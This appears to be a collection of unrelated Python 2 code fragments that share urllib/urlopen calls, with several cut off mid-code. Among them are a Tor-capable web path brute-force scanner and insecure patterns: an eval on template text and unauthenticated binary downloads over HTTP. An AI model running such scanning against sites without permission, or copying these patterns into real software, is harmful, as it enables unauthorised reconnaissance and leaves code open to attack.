region2property2value = json.loads(freebaseFile.read()) apiKey = open("/cs/research/intelsys/home1/avlachos/freebaseApiKey").read() mqlreadUrl = 'https://www.googleapis.com/freebase/v1/mqlread' aliasQueryParams = { 'key': apiKey, } # the limit gives back only one result, which seems to be the most popular and the one we are interested in aliasQuery = { "/common/topic/alias": [], "type": "/location/statistical_region", "limit":1 } region2aliases = {} for regionName in region2property2value: print regionName.encode('utf-8') aliasQuery["name"] = regionName aliasQueryParams["query"] = json.dumps(aliasQuery) aliasUrl = mqlreadUrl + '?' + urllib.urlencode(aliasQueryParams) aliasJSON = json.loads(urllib.urlopen(aliasUrl).read()) region2aliases[regionName] = aliasJSON["result"]["/common/topic/alias"] with open(sys.argv[2], "wb") as out: json.dump(region2aliases, out) print len(region2aliases), " region names with aliases"
def get_current_selfmenu_info(self, accessToken): postUrl = "https://api.weixin.qq.com/cgi-bin/get_current_selfmenu_info?access_token=%s" % accessToken urlResp = urllib.urlopen(url=postUrl) print urlResp.read()
def getHtml(url): return urllib.urlopen(url).read() #返回网页源码
def create(self, postData, accessToken): postUrl = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=%s" % accessToken if isinstance(postData, unicode): postData = postData.encode('utf-8') urlResp = urllib.urlopen(url=postUrl, data=postData) print urlResp.read()
def _image(self, node): import urllib import urlparse from reportlab.lib.utils import ImageReader nfile = node.get('file') if not nfile: if node.get('name'): image_data = self.images[node.get('name')] _logger.debug("Image %s used", node.get('name')) s = StringIO(image_data) else: newtext = node.text if self.localcontext: res = utils._regex.findall(newtext) for key in res: newtext = eval(key, {}, self.localcontext) or '' image_data = None if newtext: image_data = base64.decodestring(newtext) if image_data: s = StringIO(image_data) else: _logger.debug("No image data!") return False else: if nfile in self.images: s = StringIO(self.images[nfile]) else: try: up = urlparse.urlparse(str(nfile)) except ValueError: up = False if up and up.scheme: # RFC: do we really want to open external URLs? # Are we safe from cross-site scripting or attacks? _logger.debug("Retrieve image from %s", nfile) u = urllib.urlopen(str(nfile)) s = StringIO(u.read()) else: _logger.debug("Open image file %s ", nfile) s = _open_image(nfile, path=self.path) try: img = ImageReader(s) (sx,sy) = img.getSize() _logger.debug("Image is %dx%d", sx, sy) args = { 'x': 0.0, 'y': 0.0, 'mask': 'auto'} for tag in ('width','height','x','y'): if node.get(tag): args[tag] = utils.unit_get(node.get(tag)) if ('width' in args) and (not 'height' in args): args['height'] = sy * args['width'] / sx elif ('height' in args) and (not 'width' in args): args['width'] = sx * args['height'] / sy elif ('width' in args) and ('height' in args): if (float(args['width'])/args['height'])>(float(sx)>sy): args['width'] = sx * args['height'] / sy else: args['height'] = sy * args['width'] / sx self.canvas.drawImage(img, **args) finally: s.close()
def get_challenge(s): return urllib.urlopen('http://www.pythonchallenge.com/pc/' + s).read()
def processRequest(req): if req.get("result").get("action") != "yahooWeatherForecast": return {} global city_names city_names=processlocation(req) global QR global intent_name intent_name=processIntentName(req) if "ChooseCity" in intent_name: QR[0]="Sector in "+city_names QR[1]="Other City?Specify" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Property Type" elif "ChooseSector" in intent_name: QR[0]="(Y)" QR[1]="Other Sector?Specify" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Property Type" elif "ChangeType" in intent_name: QR[0]="(Y)" QR[1]="Other Type?Specify" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Change Location" elif "ChooseHotProperties" in intent_name: QR[0]="(Y)" QR[1]="Change Location" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Change City" elif "ChoosePlotArea" in intent_name: QR[0]="(Y)" QR[1]="Other Area?Specify" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Change Location" elif "DefinePriceRange" in intent_name: QR[0]="(Y)" QR[1]="Other Range?Specify" QR[2]="Hot Property" QR[3]="Price Range" QR[4]="Land Area" QR[5]="Change Location" city_names=processlocation(req) sector_names=processSector(req) property_type=processPropertyType(req) unit_property=processUnit(req) area_property=processArea(req) NoOfDays=processDate(req) DateUnit=processDateUnit(req) school=processSchool(req) malls=processMalls(req) transport=processTransport(req) security=processSecurity(req) airport=processAirport(req) fuel=processFuel(req) #minimum_value=processMinimum(req) maximum_value=processMaximum(req) latest=processLatestProperties(req) #if minimum_value > maximum_value: # minimum_value,maximum_value=maximum_value,minimum_value #else: # minimum_value,maximum_value=minimum_value,maximum_value baseurl = "https://aarz.pk/bot/index.php?city_name="+city_names+"§or_name="+sector_names+"&minPrice="+maximum_value+"&type="+property_type+"&LatestProperties="+latest+"&UnitArea="+area_property+"&Unit="+unit_property+"&school="+school+"&airport="+airport+"&transport="+transport+"&security="+security+"&shopping_mall="+malls+"&fuel="+fuel result = urllib.urlopen(baseurl).read() data = json.loads(result) res = makeWebhookResult(data) return res
def get_data(self): """ Return the contents of the artifact """ url = "{}artifact/{}".format(self.build_url, self.artifact_dict['relativePath']) url_data = urllib.urlopen(url).read() return url_data
"class %%% has-a function named *** that takes self and @@@ parameters.", "*** = %%%()": "Set *** to an instance of class %%%.", "***.***(@@@)": "From *** get the *** function, and call it with parameters self, @@@.", "***.*** = '***'": "From *** get the *** attribute and set it to '***'." } # do they want to drill phrases first PHRASE_FIRST = False if len(sys.argv) == 2 and sys.argv[1] == "english": PHRASE_FIRST = True # load up the words from the website for word in urlopen(WORD_URL).readlines(): WORDS.append(word.strip()) def convert(snippet, phrase): class_names = [w.capitalize() for w in random.sample(WORDS, snippet.count("%%%"))] other_names = random.sample(WORDS, snippet.count("***")) results = [] param_names = [] for i in range(0, snippet.count("@@@")): param_count = random.randint(1,3) param_names.append(', '.join(random.sample(WORDS, param_count))) for sentence in snippet, phrase:
def get_jsonparsed_data(url): d = json.load(urlopen(url)) return d
import urllib, sys, os, md5 files = "orange", "corn", "statc", "orangeom", "orangene", "_orngCRS" baseurl = "http://www.ailab.si/orange/download/binaries/%i%i/" % sys.version_info[:2] fleurl = baseurl + "%s.pyd" op = filter(lambda x:x[-7:].lower() in ["\\orange", "/orange"], sys.path) if not op: print "Orange is not found on the Python's path" print "Downloading to %s (for Python %i.%i)" % (op[0], sys.version_info[0], sys.version_info[1]) os.chdir(op[0]) def rep(blk_cnt, blk_size, tot_size): print "\rDownloading %s: %i of %i" % (fle, min(tot_size, blk_cnt*blk_size), tot_size), repository_stamps = dict([tuple(x.split()) for x in urllib.urlopen(baseurl + "stamps_pyd.txt") if x.strip()]) for fle in files: if os.path.exists(fle+".pyd") and repository_stamps[fle+".pyd"] == md5.md5(file(fle+".pyd", "rb").read()).hexdigest().upper(): print "\nSkipping %s" % fle, else: print "\nDownloading %s" % fle, urllib.urlretrieve(fleurl % fle, fle+".temp", rep) if os.path.exists(fle+".pyd"): os.remove(fle+".pyd") os.rename(fle+".temp", fle+".pyd")
parser.add_argument("-t", "--target", help="The URL of the TARGET to scan.", required=True) parser.add_argument("-w", "--wordlist", help="The paths to locate.", required=True) parser.add_argument("--validation", help="Try to find a string to validate the results.", required=False) parser.add_argument("--extension", help="Add an extension.", required=False) parser.add_argument("--threads", help="Number of threads [default=10].", required=False) parser.add_argument("--tor-host", help="Tor server.", required=False) parser.add_argument("--tor-port", help="Tor port server.", required=False) args = parser.parse_args() if args.tor_host: print_message(" Opening Tor socket... ") socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.tor_host, int(args.tor_port), True) socket.socket = socks.socksocket socket.create_connection = create_tor_connection print_message("OK (" + urlopen('http://ip.42.pl/raw').read() + ").\n") if args.target and args.wordlist: if (os.path.isfile(args.wordlist)): words = [] print_message(" Reading the list... ") file = open(args.wordlist) for line in file.readlines(): words.append(line.strip()) file.close() count_paths = locale.format("%d", len(words), grouping=True) print_message("OK.\n\tThe selected file contains " + count_paths + " paths.\n") final_list = words; if args.extension: print_message("\t Adding extension " + args.extension + " ... ") for path in words:
def crawl_problem_statement(tipo,url_problema): global delay f = open('enunciados.txt','a') while True: try: pagina = urllib.urlopen(url_problema) delay = max(1,delay/2) break except IOError: print('\nIOError: Delaying ' + str(delay) + ' time.\n') time.sleep(delay) delay = min(2 * delay,256) contenido = pagina.read() contenido = re.sub('\\t',' ',contenido) contenido = re.sub('\\n',' ',contenido) # view-source:http://www.artofproblemsolving.com/Forum/viewtopic.php?f=37&t=5560 # http://www.regular-expressions.info/lookaround.html enunciados = re.findall('\<div class="postbody"\>.*?\</div\> ',contenido,re.S) assert len(enunciados) > 0 tipo_str = get_tipo_str(tipo) enunciado = enunciados[0] #f.write(enunciado) #f.write(str(len(enunciados))) #f.write('\n') #f.close() enunciado = re.sub('\\xc3\\xa1','a',enunciado) enunciado = re.sub('\\xc3\\x81','A',enunciado) enunciado = re.sub('\\xc3\\xa9','e',enunciado) enunciado = re.sub('\\xc3\\x89','E',enunciado) enunciado = re.sub('\\xc3\\xad','i',enunciado) enunciado = re.sub('\\xc3\\x93','o',enunciado) enunciado = re.sub('\\xc3\\xb3','o',enunciado) enunciado = re.sub('\\xc3\\xba','u',enunciado) enunciado = re.sub('\\xc3\\xb1','ENIE',enunciado) enunciado = re.sub('\\xc3\\x91','ENIE',enunciado) enunciado = re.sub('\\xc3\\x97',' X ',enunciado) enunciado = re.sub('\\xc3a','a',enunciado) enunciado = re.sub('\\xc3e','e',enunciado) enunciado = re.sub('\\xc3i','i',enunciado) enunciado = re.sub('\\xc3o','o',enunciado) enunciado = re.sub('\\xc3u','u',enunciado) enunciado = re.sub('\\xc2\\xba',' DEG ',enunciado) # simbolo ^circ enunciado = re.sub('\\xc2\\xb0',' DEG ',enunciado) # simbolo ^circ enunciado = re.sub('\\xc2\\xbf','',enunciado) # signos de pregunta invertidos enunciado = re.sub('\\xc2\\xa1',' ',enunciado) # signos de exclamacion invertidos enunciado = re.sub('\\xc2\\xb7',' BULLET ',enunciado) # bullets enunciado = re.sub('\\xe2\\x80\\x9c',' ',enunciado) # " enunciado = re.sub('\\xe2\\x80\\x9d',' ',enunciado) # " enunciado = re.sub('\\xc2\\xb1',' PLUSMINUS ',enunciado) # +- latex = '' for x in re.findall('title="[^"]+"',enunciado,re.I): latex = latex + ' $' + x[7: len(x) - 1] + '$ ' enunciado = re.sub('\<[^\>]+\>',' ',enunciado) enunciado = enunciado + latex datos_problema = (url_problema,tipo_str,enunciado) datos_problema_str = str(datos_problema) f.write(datos_problema_str) f.write('\n')
def get_poster(id, url): pic = urllib.urlopen(url).read() file_name = 'poster/%s.jpg' % id f = file(file_name, "wb") f.write(pic) f.close()